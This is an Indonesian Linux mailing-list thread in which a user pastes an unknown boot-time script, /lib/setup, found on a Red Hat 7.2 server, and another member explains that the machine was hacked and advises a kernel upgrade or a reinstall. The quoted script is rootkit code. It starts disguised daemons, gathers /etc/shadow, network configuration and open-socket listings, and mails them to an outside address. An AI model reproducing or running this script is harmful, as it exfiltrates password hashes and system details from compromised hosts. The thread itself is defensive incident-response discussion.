He...he...he...
Linux anda udah kebobolan tuch pak ...:-(
Sang hacker punya email di [EMAIL PROTECTED], coba hubungi aja dan ajak makan bersama :)


Untuk amannya, segera lakukan cek system secara total.
Matikan daemon yang gak perlu dan bermasalah, dan jangan lupa bahwa RedHat 7.2 dgn default installasi, masih vurnarable dgn PTRACE exploit, jadi kalo mempertahankan RH 7.2 nya, jangan lupa upgrade kernel anda.


Kalo gak mau pusing, install ulang ajah.
Saran saya, pake Trustix Secure Linux 2. Dia udah kernel 2.4, serta secara default dia sangat ketat. Sbg contoh, bila kita buat file baru, maka secara default permisionnya 600.
Juga, kalo jalanin BIND, dia secara default dubuatin chroot utk jalanin BIND.


CMIIW

Agung Ud


At 02:41 25/09/2003 +0700, you wrote:
Dear All,

Di RH 7.2 saya ada file yang
Namanya /lib/setup dan berisi sbb;

PWD=`pwd`
cd /lib
export PATH=.:$PATH
httpd >/dev/null
cd /usr/lib
identd & >/dev/null
cd "$PWD"

/sbin/ifconfig | grep inet >/tmp/mailtone
echo ############################## >> /tmp/mailtone
uname -a >> /tmp/mailtone
echo ############################## >> /tmp/mailtone
hostname -i >> /tmp/mailtone
echo ############################## >> /tmp/mailtone
uptime >> /tmp/mailtone
echo ############################## >> /tmp/mailtone
ping -c 2 216.115.108.245 >> /tmp/mailtone
system(" echo ############################## >>/tmp/mailtone cat
/etc/shadow >>/tmp/mailtone echo ############################## >>
/tmp/mailtone cat /etc/*release >>/tmp/mailtone echo
############################## >> /tmp/mailtone /usr/sbin/lsof -i -n -P
>>/tmp/mailtone echo ############################## >> /tmp/mailtone cat
/etc/sysconfig/nework-scripts/ifcfg* >> /tmp/mailtone echo
############END############### >> /tmp/mailtone cat /tmp/mailtone |mail -s
power-6668 [EMAIL PROTECTED] rm -f /tmp/mailtone


Karena gak tau dan pas booting tampaknya File ini dipanggil beberapa kali oleh rc.local, sysinit, dll Untuk sementara saya rename aja jadi setup2 - akibat muncul err. Message file not found. Buat apa ya ada yang kepengen tau data2 seperti tersebut di atas? Ada yang bisa kasih info gak ini file apa?


-- regards,

Tajid Yakub,
http://www.breakfree.web.id



-- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php



Kirim email ke